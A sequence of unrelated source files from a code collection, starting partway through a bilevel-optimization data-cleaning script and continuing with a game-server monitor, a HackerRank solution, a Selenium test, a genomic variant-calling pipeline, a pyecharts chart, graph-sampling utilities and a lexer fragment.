    return torch.autograd.grad(
        g(x, w, dataset), w,
        retain_graph=retain_graph, create_graph=create_graph)[0]
def g_x_xhat_w(x, xhat, w, dataset, retain_graph=False, create_graph=False):
    """Return g(x,w) - g(xhat,w) (xhat detached) and its gradients w.r.t. (x, w)."""
    diff = g(x, w, dataset) - g(xhat.detach(), w, dataset)
    grad_x, grad_w = torch.autograd.grad(
        diff, [x, w],
        retain_graph=retain_graph, create_graph=create_graph)
    return diff, grad_x, grad_w
def g_x_xhat_w_bo(x, xhat, w, dataset, retain_graph=False, create_graph=False):
    """Gradients of g(x,w) - g(xhat,w) w.r.t. (x, xhat, w); xhat is NOT detached."""
    diff = g(x, w, dataset) - g(xhat, w, dataset)
    grads = torch.autograd.grad(
        diff, [x, xhat, w],
        retain_graph=retain_graph, create_graph=create_graph)
    return grads[0], grads[1], grads[2]
def f_x(x, w, dataset, retain_graph=False, create_graph=False):
    """Gradient of the upper-level loss f with respect to x."""
    return torch.autograd.grad(
        f(x, w, dataset), x,
        retain_graph=retain_graph, create_graph=create_graph)[0]
### Define evaluation metric
def evaluate(x, testset):
    """Return (cross-entropy loss, accuracy) of model ``x`` on ``testset``."""
    with torch.no_grad():
        inputs, targets = testset
        logits = model_forward(x, inputs)
        loss = F.cross_entropy(logits, targets).detach().item()
        acc = logits.argmax(-1).eq(targets).float().mean().detach().cpu().item()
    return loss, acc
def evaluate_importance_f1(w, clean_indices):
    """Precision/recall/F1 of the thresholded weights ``w`` (> 0.5) against
    the boolean mask of truly clean samples.

    Small 1e-4 terms guard all divisions against zero denominators.
    """
    with torch.no_grad():
        predicted_clean = w.gt(0.5).float()
        true_pos = (predicted_clean * clean_indices.float()).sum()
        recall = true_pos / (clean_indices.float().sum() + 1e-4)
        precision = true_pos / (predicted_clean.sum() + 1e-4)
        f1 = 2.0 * recall * precision / (recall + precision + 1e-4)
        return precision.cpu().item(), recall.cpu().item(), f1.cpu().item()
###############################################################################
#
# Bilevel Optimization Training Methods
#
###############################################################################
def simple_train(args, x, data_x, data_y, testset, tag='pretrain', regularize=False): # directly train on the dataset
    """Plain (non-bilevel) full-batch SGD training of model ``x``.

    Tracks the best test loss over 5000 epochs and returns
    (best_test_loss, matching_test_acc, best_parameter_snapshot).
    """
    opt = torch.optim.SGD([x], lr=args.x_lr)
    n = data_x.shape[0]  # NOTE(review): unused
    n_epochs = 5000
    final_test_loss = np.inf
    final_test_acc = 0.
    best_x = None
    for epoch in range(n_epochs):
        opt.zero_grad()
        y = model_forward(x, data_x)
        loss = F.cross_entropy(y, data_y)
        if regularize:
            # Same L2 penalty as the lower-level objective g.
            loss += 0.001 * x.norm(2).pow(2)
        loss.backward()
        opt.step()
        test_loss, test_acc = evaluate(x, testset)
        # Keep the snapshot with the lowest test loss seen so far.
        # NOTE(review): model selection on the *test* set leaks test info.
        if test_loss <= final_test_loss:
            final_test_loss = test_loss
            final_test_acc = test_acc
            best_x = x.data.clone()
        print(f"[{tag}] epoch {epoch:5d} test loss {test_loss:10.4f} test acc {test_acc:10.4f}")
    return final_test_loss, final_test_acc, best_x
def F2BA(args, x, w, trainset, valset, testset, clean_indices):
    """Fully first-order bilevel method: outer SGD on sample weights ``w``,
    inner SGD on the model ``x`` and auxiliary ``xhat`` with penalty
    multiplier ``args.lmbd``.

    Returns a list of (elapsed_time, test_loss, test_acc), one per epoch.
    """
    xhat = copy.deepcopy(x)
    total_time = 0.0
    n = trainset[0].shape[0]  # NOTE(review): unused
    stats = []
    outer_opt = torch.optim.SGD([w], lr=args.w_lr)
    inner_opt = torch.optim.SGD([
        {'params': [x], 'lr': args.x_lr},
        {'params': [xhat], 'lr': args.xhat_lr}])
    for epoch in range(args.epochs):
        # Restart the auxiliary variable from the current x each outer step.
        xhat.data = x.data.clone()
        t0 = time.time()
        for it in range(args.iterations):
            inner_opt.zero_grad()
            gx = g_x(xhat, w, trainset)
            fx = f_x(x, w, valset)
            # NOTE(review): gx is evaluated at xhat and reused in x's update;
            # confirm this matches the intended F2BA inner update.
            xhat.grad = args.lmbd * gx
            x.grad = fx + args.lmbd * gx
            inner_opt.step()
        # Hypergradient estimate: lmbd * (grad_w g(x) - grad_w g(xhat)).
        _, gx, gw_minus_gw_k = g_x_xhat_w(x, xhat, w, trainset)
        outer_opt.zero_grad()
        w.grad = args.lmbd * gw_minus_gw_k
        outer_opt.step()
        t1 = time.time()
        total_time += t1 - t0
        # Project the sample weights back onto [0, 1].
        w.data.clamp_(0.0, 1.0)
        test_loss, test_acc = evaluate(x, testset)
        f1 = evaluate_importance_f1(w, clean_indices)
        stats.append((total_time, test_loss, test_acc))
        print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f} | f1 {f1[2]:4.2f}")
    return stats
def AID(args, x, w, trainset, valset, testset, clean_indices):
    """Approximate Implicit Differentiation baseline: inner gradient descent
    on x, then a conjugate-gradient solve (hg.CG) for the hypergradient of w.

    Returns a list of (elapsed_time, test_loss, test_acc), one per epoch.
    """
    # The hypergrad package expects losses over *lists* of parameter tensors.
    outer_loss = lambda x, w: f(x[0], w[0], valset)
    inner_loss = lambda x, w, d: g(x[0], w[0], d)
    inner_opt = hg.GradientDescent(inner_loss, args.x_lr, data_or_iter=trainset)
    inner_opt_cg = hg.GradientDescent(inner_loss, 1., data_or_iter=trainset)
    outer_opt = torch.optim.SGD([w], lr=args.w_lr)
    total_time = 0.0
    stats = []
    for epoch in range(args.epochs):
        t0 = time.time()
        x_history = [[x]]
        for it in range(args.iterations):
            x_history.append(inner_opt(x_history[-1], [w], create_graph=False))
        outer_opt.zero_grad()
        # args.K CG steps approximate the inverse-Hessian-vector product;
        # set_grad=True writes the hypergradient into w.grad.
        hg.CG([x_history[-1][0]], [w], args.K, inner_opt_cg, outer_loss, stochastic=False, set_grad=True)
        outer_opt.step()
        t1 = time.time()
        total_time += t1 - t0
        w.data.clamp_(0.0, 1.0)
        # Adopt the final inner iterate as the new model.
        x.data = x_history[-1][0].data.clone()
        test_loss, test_acc = evaluate(x, testset)
        stats.append((total_time, test_loss, test_acc))
        print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f}")
    return stats
def ITD(args, x, w, trainset, valset, testset, clean_indices):
    """Iterative Differentiation baseline: unroll the inner GD trajectory
    with create_graph=True and backpropagate the outer loss through it.

    Returns a list of (elapsed_time, test_loss, test_acc), one per epoch.
    (An unused ``momentum`` buffer that was allocated every epoch has been
    removed; it was never read or written after creation.)
    """
    # The hypergrad package expects losses over *lists* of parameter tensors.
    outer_loss = lambda x, w: f(x[0], w[0], valset)
    inner_loss = lambda x, w, d: g(x[0], w[0], d)
    inner_opt = hg.GradientDescent(inner_loss, args.x_lr, data_or_iter=trainset)
    outer_opt = torch.optim.SGD([w], lr=args.w_lr)
    total_time = 0.0
    stats = []
    for epoch in range(args.epochs):
        t0 = time.time()
        # Unroll the inner optimization, keeping the graph for backprop.
        x_history = [[x]]
        for it in range(args.iterations):
            x_history.append(inner_opt(x_history[-1], [w], create_graph=True))
        outer_opt.zero_grad()
        loss = outer_loss([x_history[-1][0]], [w])
        grad = torch.autograd.grad(loss, w)[0]
        w.grad = grad.data.clone()
        outer_opt.step()
        t1 = time.time()
        total_time += t1 - t0
        w.data.clamp_(0.0, 1.0)
        # Adopt the final inner iterate as the new model.
        x.data = x_history[-1][0].data.clone()
        test_loss, test_acc = evaluate(x, testset)
        stats.append((total_time, test_loss, test_acc))
        print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f}")
    return stats
if __name__ == "__main__":
    args = parse_args()
    # BUG FIX: the original condition was `args.pretrain is True`, which is
    # always False because argparse yields the int 0/1 and `1 is True` is
    # False in Python 3 -- the pretraining branch was unreachable.
    # Compare by value instead.
    if args.pretrain == 1:  # preprocess data and pretrain a model on valset
        if not os.path.exists(args.data_path):
            os.makedirs(args.data_path)
        if not os.path.exists(args.model_path):
            os.makedirs(args.model_path)
        ### generate data
        trainset, valset, testset, old_train_y = get_data(args)
        torch.save((trainset, valset, testset, old_train_y),
                   os.path.join(args.data_path, f"{args.dataset}_data_cleaning.pt"))
        print(f"[info] successfully generated data to {args.data_path}/{args.dataset}_data_cleaning.pt")
        ### pretrain a model and save it
        n_feats = np.prod(*trainset[0].shape[1:])
        num_classes = trainset[1].unique().shape[-1]
        args.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
        trainset = (trainset[0].to(args.device), trainset[1].to(args.device))
        valset = (valset[0].to(args.device), valset[1].to(args.device))
        testset = (testset[0].to(args.device), testset[1].to(args.device))
        old_train_y = old_train_y.to(args.device)
        x = get_model(n_feats, num_classes, args.device)
        sd = x.data.clone()  # initial weights, reused for every baseline
        # lower bound (train on noisy train + valset)
        tmp_x = torch.cat([trainset[0], valset[0]], 0)
        tmp_y = torch.cat([trainset[1], valset[1]], 0)
        test_loss1, test_acc1, best_x1 = simple_train(args, x, tmp_x, tmp_y, testset, regularize=True)
        torch.save(best_x1.data.cpu().clone(),
                   os.path.join(args.model_path, f"{args.dataset}_pretrained.pt"))
        # a baseline: train on valset
        x.data.copy_(sd)
        test_loss2, test_acc2, best_x2 = simple_train(args, x, valset[0], valset[1], testset)
        torch.save(best_x2.data.cpu().clone(),
                   os.path.join(args.model_path, f"{args.dataset}_pretrained_val.pt"))
        # upper bound (train on correct train + valset)
        x.data.copy_(sd)
        tmp_x = torch.cat([trainset[0], valset[0]], 0)
        tmp_y = torch.cat([old_train_y, valset[1]], 0)
        test_loss3, test_acc3, best_x3 = simple_train(args, x, tmp_x, tmp_y, testset)
        torch.save(best_x3.data.cpu().clone(),
                   os.path.join(args.model_path, f"{args.dataset}_pretrained_trainval.pt"))
        print(f"[pretrained] noisy train + val : test loss {test_loss1} test acc {test_acc1}")
        print(f"[pretrained] val : test loss {test_loss2} test acc {test_acc2}")
        print(f"[pretrained] correct train + val : test loss {test_loss3} test acc {test_acc3}")
        torch.save({
            "pretrain_test_loss": test_loss1,
            "pretrain_test_acc": test_acc1,
            "pretrain_val_test_loss": test_loss2,
            "pretrain_val_test_acc": test_acc2,
            "pretrain_trainval_test_loss": test_loss3,
            "pretrain_trainval_test_acc": test_acc3,
        }, os.path.join(args.model_path, f"{args.dataset}_pretrained.stats"))
    else:  # load pretrained model on valset and then start model training
        trainset, valset, testset, old_train_y = torch.load(
            os.path.join(args.data_path, f"{args.dataset}_data_cleaning.pt"))
        args.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
        n_feats = np.prod(*trainset[0].shape[1:])
        num_classes = trainset[1].unique().shape[-1]
        trainset = (trainset[0].to(args.device), trainset[1].to(args.device))
        valset = (valset[0].to(args.device), valset[1].to(args.device))
        testset = (testset[0].to(args.device), testset[1].to(args.device))
        old_train_y = old_train_y.to(args.device)
        x = get_model(n_feats, num_classes, args.device)
        x.data.copy_(torch.load(os.path.join(args.model_path, f"{args.dataset}_pretrained.pt")).to(args.device))
        # load the pretrained model on validation set
        pretrained_stats = torch.load(
            os.path.join(args.model_path, f"{args.dataset}_pretrained.stats"))
        test_loss1 = pretrained_stats['pretrain_test_loss']
        test_loss2 = pretrained_stats['pretrain_val_test_loss']
        test_loss3 = pretrained_stats['pretrain_trainval_test_loss']
        test_acc1 = pretrained_stats['pretrain_test_acc']
        test_acc2 = pretrained_stats['pretrain_val_test_acc']
        test_acc3 = pretrained_stats['pretrain_trainval_test_acc']
        print(f"[pretrained] noisy train + val : test loss {test_loss1} test acc {test_acc1}")
        print(f"[pretrained] val : test loss {test_loss2} test acc {test_acc2}")
        print(f"[pretrained] correct train + val : test loss {test_loss3} test acc {test_acc3}")
        test_loss, test_acc = evaluate(x, testset)
        print("original test loss ", test_loss, "original test acc ", test_acc)
        clean_indices = old_train_y.to(args.device).eq(trainset[1])
        # Every sample weight starts at 0.5 ("undecided").
        w = torch.zeros(trainset[0].shape[0], requires_grad=True, device=args.device)
        w.data.add_(0.5)
        # Dispatch to the chosen algorithm; --alg is restricted to METHODS,
        # so eval() can only resolve one of the known function names here.
        stats = eval(args.alg)(args=args,
                               x=x,
                               w=w,
                               trainset=trainset,
                               valset=valset,
                               testset=testset,
                               clean_indices=clean_indices)
        if args.alg == 'F2BA':
            save_path = f"./{args.model_path}/{args.dataset}_{args.alg}_k{args.iterations}_xlr{args.x_lr}_wlr{args.w_lr}_xhatlr{args.xhat_lr}_lmbd{args.lmbd}_sd{args.seed}"
        else:
            save_path = f"./{args.model_path}/{args.dataset}_{args.alg}_k{args.iterations}_xlr{args.x_lr}_wlr{args.w_lr}_xhatlr{args.xhat_lr}_sd{args.seed}"
        torch.save(stats, save_path)
| TrueNobility303/F2BA | single_machine/data_cleaning.py | data_cleaning.py | py | 17,970 | python | en | code | 0 | github-code | 50 |
22948851168 | #!/usr/bin/env python2
import valve.source.a2s as a2s
import os
import sys
import socket
import time
import supervisor.xmlrpc
import xmlrpclib
# Unix socket that supervisord exposes for XML-RPC control.
supervisor_socket = "unix:///tmp/supervisor.sock"
# The LOCATION env var selects which set of game servers this host runs.
try:
    location = os.environ["LOCATION"]
    if location not in ("DE", "IL", "AU", "NL"):
        raise KeyError
except KeyError:
    print("Invalid LOCATION env value.")
    sys.exit()
# Map of local query port -> supervisor process name suffix, per location.
if location == "DE":
    SERVERS = {27960: "turbo1", 27961: "turbo2", 27962: "turbo3", 27963: "turbo4",
               27970: "classic1", 27971: "classic2", 27972: "classic3", 27973: "classic4"}
elif location == "IL":
    SERVERS = {27960: "turbo1", 27961: "turbo2", 27962: "turbo3", 27970: "classic1", 27971: "classic2"}
elif location == "AU":
    SERVERS = {27960: "turbo1", 27961: "turbo2", 27970: "classic1", 27971: "classic2"}
else:
    SERVERS = {27960: "turbo", 27961: "classic"}
def main():
    """Poll every configured server; re-check unresponsive ones after 20
    seconds and restart those that are still down."""
    offline = []
    for port, name in sorted(SERVERS.items()):
        info = get_server_info(port)
        if info:
            players = "{player_count}/{max_players}".format(**info)
            print("{} (localhost:{}) is running {}".format(name, port, players))
        else:
            offline.append(port)
            print("{} (localhost:{}) is offline. Will check again in 20 seconds.".format(name, port))
    if offline:
        # Give the servers a grace period before deciding to restart.
        time.sleep(20)
        for port in offline:
            info = get_server_info(port)
            if info:
                players = "{player_count}/{max_players}".format(**info)
                print("{} (localhost:{}) is now running {}".format(SERVERS[port], port, players))
            else:
                print("{} (localhost:{}) is still offline. Restarting...".format(SERVERS[port], port))
                # Strip trailing digits to get the supervisor group, e.g.
                # "turbo2" -> group "turbo", process "turbo:qzeroded_turbo2".
                group = SERVERS[port].rstrip("0123456789")
                restart("{}:qzeroded_{}".format(group, SERVERS[port]))
def get_server_info(port):
    """Return the A2S info dict for the local server on ``port``, or None
    when it does not respond within one second."""
    try:
        querier = a2s.ServerQuerier(("localhost", port), 1)
        return querier.get_info()
    except a2s.NoResponseError:
        return None
def restart(process_name):
    """Restart ``process_name`` (group:name) via supervisord's XML-RPC API.

    Running processes are stopped then started; already-STOPPED processes
    are left alone, so manually disabled servers stay down.
    """
    try:
        transport = supervisor.xmlrpc.SupervisorTransport(serverurl=supervisor_socket)
        server = xmlrpclib.ServerProxy("http://127.0.0.1", transport=transport)
        if server.supervisor.getProcessInfo(process_name)["statename"] != "STOPPED":
            server.supervisor.stopProcess(process_name)
            server.supervisor.startProcess(process_name)
            print("{} was restarted!".format(process_name))
        else:
            print("{} is stopped so not restarting.".format(process_name))
    except socket.error:
        print("Error connection to supervisor.")
    except xmlrpclib.Fault:
        # Raised by supervisord for an unknown process name.
        print("Invalid process name({}).".format(process_name))
if __name__ == "__main__":
    # Run a single monitoring pass.
    main()
| QLRace/server-settings | server_monitor.py | server_monitor.py | py | 2,764 | python | en | code | 2 | github-code | 50 |
70204237595 | #This solution gives 100% accuracy
#!/bin/python3
import math
import os
import random
import re
import sys
import decimal
#
# Complete the 'plusMinus' function below.
#
# The function accepts INTEGER_ARRAY arr as parameter.
#
def plusMinus(arr):
    """Print the fractions of positive, negative, and zero values in ``arr``,
    one per line with six decimal places (HackerRank "Plus Minus").

    Replaces the original three filter passes plus Decimal arithmetic with
    a single counting pass and f-string formatting; the printed output is
    the same six-fractional-digit form.
    """
    total = len(arr)
    positives = negatives = zeros = 0
    for value in arr:
        if value > 0:
            positives += 1
        elif value < 0:
            negatives += 1
        else:
            zeros += 1
    # Print in the required order: positive, negative, zero.
    for count in (positives, negatives, zeros):
        print(f"{count / total:.6f}")
if __name__ == '__main__':
    # HackerRank stub: first line is the element count (parsed but unused
    # beyond consumption), second line holds the space-separated integers.
    n = int(input().strip())
    arr = list(map(int, input().rstrip().split()))
    plusMinus(arr)
| M-Umr/Python_Language_Prepration | HackerRank/plus_minus.py | plus_minus.py | py | 1,090 | python | en | code | 1 | github-code | 50 |
12359666247 | import unittest
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
class RegisterNewUser(unittest.TestCase):
    """UI test for the demo store's language <select> drop-down."""
    # NOTE(review): setUp/tearDown are the *per-test* hooks but are declared
    # as classmethods here; unittest still invokes them before/after each
    # test (bound to the class).  If one shared driver was intended, these
    # should be setUpClass/tearDownClass instead.
    @classmethod
    def setUp(cls) -> None:
        service = Service(executable_path="./chromedriver.exe")
        cls.driver = webdriver.Chrome(service=service)
        driver = cls.driver
        driver.maximize_window()
        driver.get("http://demo-store.seleniumacademy.com/")
        driver.implicitly_wait(15)
    def test_select_language(self):
        # Expect exactly these options, with English pre-selected.
        exp_options = ['English', 'French', 'German']
        act_options = []
        select_language = Select(self.driver.find_element(by=By.ID, value="select-language"))
        self.assertEqual(len(exp_options), len(select_language.options))
        for option in select_language.options:
            act_options.append(option.text)
        self.assertListEqual(exp_options, act_options)
        self.assertEqual('English', select_language.first_selected_option.text)
        # Switching to German navigates; the URL query string reflects it.
        select_language.select_by_visible_text("German")
        self.assertTrue("store=german" in self.driver.current_url)
        # Re-locate the element after navigation before switching back.
        select_language = Select(self.driver.find_element(by=By.ID, value="select-language"))
        select_language.select_by_index(0)
    @classmethod
    def tearDown(cls) -> None:
        cls.driver.implicitly_wait(15)
        cls.driver.quit()
if __name__ == '__main__':
    # verbosity=2 prints one line per test method.
    unittest.main(verbosity=2)
| Kerepakupai/seleniumProject | select_language.py | select_language.py | py | 1,510 | python | en | code | 0 | github-code | 50 |
21643310861 | import shutil
import glob
import subprocess
import os
import pandas as pd
'''by James C. Hu
This script will:
1) peform ivar variant calling on all bam files within a directory.
2) Pull and combine variant data based on locations given by input file.
'''
# pandas terminal output options
pd.options.display.max_columns = 15
pd.options.display.width = 1000
def run_iVar_varaints(in_directory: str, out_directory: str, ref_gene_fa: str, reg_gene_gff3: str) -> None:
    '''
    Run ``samtools mpileup | ivar variants`` on every .bam file in
    ``in_directory``, writing one <prefix>_iVAR output per file into
    ``out_directory``.
    '''
    bam_files = (name for name in os.listdir(in_directory) if name.endswith('.bam'))
    for file in bam_files:
        command = f'samtools mpileup -d 0 -A -aa -q 0 -Q 0 -R {in_directory}/{file} | ivar variants -p {out_directory}/{file[:7]}_iVAR -q 20 -t 0 -r {ref_gene_fa} -g {reg_gene_gff3}'
        subprocess.call(command, shell=True)
    return None
def iVar_variant_search(in_file: str, target_nts: list) -> pd.DataFrame:
    '''
    Pull the ivar rows whose POS is in ``target_nts`` and stamp the sample
    id (parsed from the third path component of ``in_file``) into the
    REGION column.  Returns None when nothing matches.
    '''
    sample_id = in_file.split('/')[2].split('_')[0]
    variants = pd.read_csv(in_file, sep='\t')
    hits = variants[variants['POS'].isin(target_nts)].copy()
    hits['REGION'] = sample_id
    if len(hits) > 0:
        return hits
# --- Collect BAM files from the run folders into ../bam_files --------------
os.mkdir('../bam_files')
os.chdir('../')
bam_files = glob.glob('**/I*/*sortedTrimmed.bam')
for file in bam_files:
    shutil.copy(file, 'bam_files')
# NOTE(review): the next two lines chdir into 'ivar_output' *before* creating
# '../ivar_output'; this only works if a folder named 'ivar_output' already
# exists at this level -- confirm the intended order.
os.chdir('ivar_output')
os.mkdir('../ivar_output')
run_iVar_varaints('../bam_files', '../ivar_output', 'MN908947.3.fasta', 'MN908947.3.gff3')
# --- Combine per-sample variant calls at the target positions --------------
target_nts = pd.read_csv('nt_positions_infile.csv')['NT_position'].copy().to_list()
ivar_output_files = [file for file in os.listdir('../ivar_output') if file.endswith('iVAR.tsv')]
ivar_output_files.sort()
df_out = pd.DataFrame()
log_file = '../ivar_output/ivar_log.txt'  # NOTE(review): defined but never used
for file in ivar_output_files:
    print('\n============================')
    print(f'Searching for mutations in: {file}')
    print('============================\n')
    temp_df = iVar_variant_search(f'../ivar_output/{file}', target_nts)
    df_out = pd.concat([df_out, temp_df])
df_out = df_out.set_index('REGION')
# NOTE(review): the second sort_values overrides the first; a single
# sort_values(['REGION', 'POS']) may be what was intended.
df_out = df_out.sort_values('POS').sort_values('REGION')
df_out.to_csv('../ivar_output/combined_ivar_output.csv')
| ASU-Lim-Lab/Variant_calling | Variant_calling/ivar_covidseq.py | ivar_covidseq.py | py | 2,324 | python | en | code | 0 | github-code | 50 |
34650130706 | # 3D柱状图
import random
from pyecharts import options as opts
from pyecharts.charts import Bar3D
# 生成测试数据
# Synthetic data: one (hour, weekday, temperature) triple per grid cell.
data = [[x, y, random.randint(10, 40)] for y in range(7) for x in range(24)]
hours = ['12am', '1am', '2am', '3am', '4am', '5am', '6am', '7am', '8am', '9am', '10am', '11am', '12pm', '1pm', '2pm', '3pm', '4pm', '5pm', '6pm', '7pm', '8pm', '9pm', '10pm', '11pm']
weeks = ['星期六','星期五','星期四','星期三','星期二','星期一','星期日']
# Build the chart step by step instead of one chained expression.
bar3d = Bar3D(init_opts=opts.InitOpts(width='1200px', height='600px'))
bar3d.add(
    '',
    data,
    xaxis3d_opts=opts.Axis3DOpts(name='小时', type_="category", data=hours),
    yaxis3d_opts=opts.Axis3DOpts(name='星期', type_="category", data=weeks),
    zaxis3d_opts=opts.Axis3DOpts(name='温度', type_="value"),
)
bar3d.set_global_opts(
    visualmap_opts=opts.VisualMapOpts(max_=50, min_=0),
    title_opts=opts.TitleOpts(title='Q市7x24小时温度'),
)
# render() returns the output path, matching the original `c` binding.
c = bar3d.render('./3D柱状图2.html')
15960309264 | import copy
from typing import Any, Dict, Optional, Set, Tuple, Union
import torch
from torch import Tensor
from torch_scatter import scatter_min
from torch_geometric.data import Data, HeteroData
from torch_geometric.data.storage import EdgeStorage
from torch_geometric.typing import EdgeType, OptTensor
# Edge Layout Conversion ######################################################
# TODO(manan) deprecate when FeatureStore / GraphStore unification is complete
def to_csc(
    data: Union[Data, EdgeStorage],
    device: Optional[torch.device] = None,
    share_memory: bool = False,
    is_sorted: bool = False,
) -> Tuple[Tensor, Tensor, OptTensor]:
    # Convert the graph data into a suitable format for sampling (CSC format).
    # Returns the `colptr` and `row` indices of the graph, as well as a
    # `perm` vector that denotes the permutation of edges.
    # Since no permutation of edges is applied when using `SparseTensor`,
    # `perm` can be of type `None`.
    # BUG FIX: previously `col[perm]` was evaluated even when `is_sorted` is
    # True, where `perm` is None -- indexing a tensor with None inserts a new
    # leading dimension, handing a 2-D tensor to `ind2ptr`.  The permutation
    # is now applied only in the unsorted branch.
    perm: Optional[Tensor] = None
    if hasattr(data, 'adj'):
        # Already a SparseTensor adjacency: take its CSC directly.
        colptr, row, _ = data.adj.csc()
    elif hasattr(data, 'adj_t'):
        # Transposed adjacency: its CSR is the CSC of the forward graph.
        colptr, row, _ = data.adj_t.csr()
    elif data.edge_index is not None:
        (row, col) = data.edge_index
        if not is_sorted:
            # Sort edges by (col, row); keep `perm` to remap edge attributes.
            perm = (col * data.size(0)).add_(row).argsort()
            row = row[perm]
            col = col[perm]
        colptr = torch.ops.torch_sparse.ind2ptr(col, data.size(1))
    else:
        # Empty graph: all-zero column pointers, no rows.
        row = torch.empty(0, dtype=torch.long, device=device)
        colptr = torch.zeros(data.num_nodes + 1, dtype=torch.long,
                             device=device)
    colptr = colptr.to(device)
    row = row.to(device)
    perm = perm.to(device) if perm is not None else None
    if not colptr.is_cuda and share_memory:
        # Allow CPU tensors to be shared across worker processes.
        colptr.share_memory_()
        row.share_memory_()
        if perm is not None:
            perm.share_memory_()
    return colptr, row, perm
def to_hetero_csc(
    data: HeteroData,
    device: Optional[torch.device] = None,
    share_memory: bool = False,
    is_sorted: bool = False,
) -> Tuple[Dict[str, Tensor], Dict[str, Tensor], Dict[str, OptTensor]]:
    # Convert each edge type of a heterogeneous graph into CSC format.
    # Returns per-edge-type dictionaries of `colptr`, `row` and `perm`.
    colptr_dict: Dict[str, Tensor] = {}
    row_dict: Dict[str, Tensor] = {}
    perm_dict: Dict[str, OptTensor] = {}
    for store in data.edge_stores:
        colptr, row, perm = to_csc(store, device, share_memory, is_sorted)
        colptr_dict[store._key] = colptr
        row_dict[store._key] = row
        perm_dict[store._key] = perm
    return colptr_dict, row_dict, perm_dict
# Edge-based Sampling Utilities ###############################################
def add_negative_samples(
    edge_label_index,
    edge_label,
    edge_label_time,
    num_src_nodes: int,
    num_dst_nodes: int,
    negative_sampling_ratio: float,
):
    """Append uniformly-sampled negative edges (with matching labels and,
    if given, times) when ``negative_sampling_ratio > 0``.

    Positive labels are shifted up by one; negatives get label 0.  The
    inputs are returned untouched when no negatives are requested.
    """
    n_pos = edge_label_index.size(1)
    n_neg = int(n_pos * negative_sampling_ratio)
    if n_neg == 0:
        return edge_label_index, edge_label, edge_label_time
    rand_src = torch.randint(num_src_nodes, (n_neg, ))
    rand_dst = torch.randint(num_dst_nodes, (n_neg, ))
    neg_index = torch.stack([rand_src, rand_dst], dim=0)
    if edge_label_time is not None:
        # Reuse times of randomly chosen positive edges for the negatives.
        shuffle = torch.randperm(n_pos)
        edge_label_time = torch.cat(
            [edge_label_time, edge_label_time[shuffle[:n_neg]]])
    edge_label_index = torch.cat([edge_label_index, neg_index], dim=1)
    pos_labels = edge_label + 1
    neg_labels = edge_label.new_zeros((n_neg, ) + edge_label.size()[1:])
    edge_label = torch.cat([pos_labels, neg_labels], dim=0)
    return edge_label_index, edge_label, edge_label_time
def set_node_time_dict(
    node_time_dict,
    input_type: EdgeType,
    edge_label_index,
    edge_label_time,
    num_src_nodes: int,
    num_dst_nodes: int,
):
    """For edges in a batch replace `src` and `dst` node times by the min
    across all edge times."""
    def update_time_(node_time_dict, index, node_type, num_nodes):
        # Clone so the caller's original tensor is not mutated in place.
        node_time_dict[node_type] = node_time_dict[node_type].clone()
        node_time, _ = scatter_min(edge_label_time, index, dim=0,
                                   dim_size=num_nodes)
        # NOTE We assume that node_time is always less than edge_time.
        # Only overwrite the nodes that actually appear in `index`.
        index_unique = index.unique()
        node_time_dict[node_type][index_unique] = node_time[index_unique]
    # Shallow-copy the dict so untouched node types keep their tensors.
    node_time_dict = copy.copy(node_time_dict)
    update_time_(node_time_dict, edge_label_index[0], input_type[0],
                 num_src_nodes)
    update_time_(node_time_dict, edge_label_index[1], input_type[-1],
                 num_dst_nodes)
    return node_time_dict
###############################################################################
def remap_keys(
    original: Dict,
    mapping: Dict,
    exclude: Optional[Set[Any]] = None,
) -> Dict:
    """Rename the keys of ``original`` through ``mapping``; keys listed in
    ``exclude`` are kept unchanged."""
    keep = exclude or set()
    remapped = {}
    for key, value in original.items():
        new_key = key if key in keep else mapping[key]
        remapped[new_key] = value
    return remapped
| myhz0606/pytorch_geometric | torch_geometric/sampler/utils.py | utils.py | py | 5,280 | python | en | code | null | github-code | 50 |
31175971463 | from re import split
from typing import Optional, Self
def contains_item_at_every_pos(string, items):
    """Return True if every character of ``string`` appears in ``items``.

    Same result as the original nested-loop scan, expressed with ``all``;
    an empty string vacuously returns True.
    """
    return all(ch in items for ch in string)
class Type:
def __init__(self, name: str, type_category: Optional[Self] = None) -> None:
self.name = name
self.type_category = type_category
def __repr__(self) -> str:
type_ = self
lst = [self.name]
while type_.type_category is not None:
lst.append(type_.type_category.name)
type_ = type_.type_category
lst.reverse()
return ":".join(lst)
def __call__(self, val):
return Token(self, val)
def __hash__(self) -> int:
return hash(self.name)
# Token-type hierarchy: children reference their parent category so that
# repr() prints chains such as VALUE:NUM:FRAC.
UNKNOWN = Type("UNKNOWN")
KEYWORD = Type("KEYWORD")
TYPE = Type("TYPE", KEYWORD)
VALUE = Type("VALUE")
NUM = Type("NUM", VALUE)
FRAC = Type("FRAC", NUM)
LST = Type("LST", VALUE)
STR = Type("STR", VALUE)
OPERATOR = Type("OPERATOR")
class IdToken:
    """A token *definition*: a Type plus the literal value(s) that identify it.

    Each instance self-registers in the class-level ``tokens`` list, which
    Lexer.split()/lex() iterate to recognize input pieces.
    """
    tokens: list[Self] = []
    def __init__(self, type_: Type, values: str | list[str]) -> None:
        self.type_ = type_
        self.values = values
        type(self).tokens.append(self)  # shared registry on the class
        if isinstance(values, str):
            # Single-literal definitions also expose the scalar ``value``,
            # which split() uses to build its regex alternation.
            self.value = values
# Characters that may appear in a numeric literal.
NUMBER = list("1234567890.")
# Register the recognized token definitions (order matters: lex() takes the
# first definition that matches a piece).
IdToken(TYPE, "num")
IdToken(TYPE, "frac")
IdToken(OPERATOR, "=")
IdToken(OPERATOR, "/")
IdToken(OPERATOR, "-")
IdToken(NUM, NUMBER)
class Token:
    """A concrete lexed token: a Type plus the matched source text."""
    def __init__(self, type_: Type, value: str) -> None:
        self.type_ = type_
        self.value = value
    def __repr__(self) -> str:
        return f'{self.type_!r}("{self.value}")'
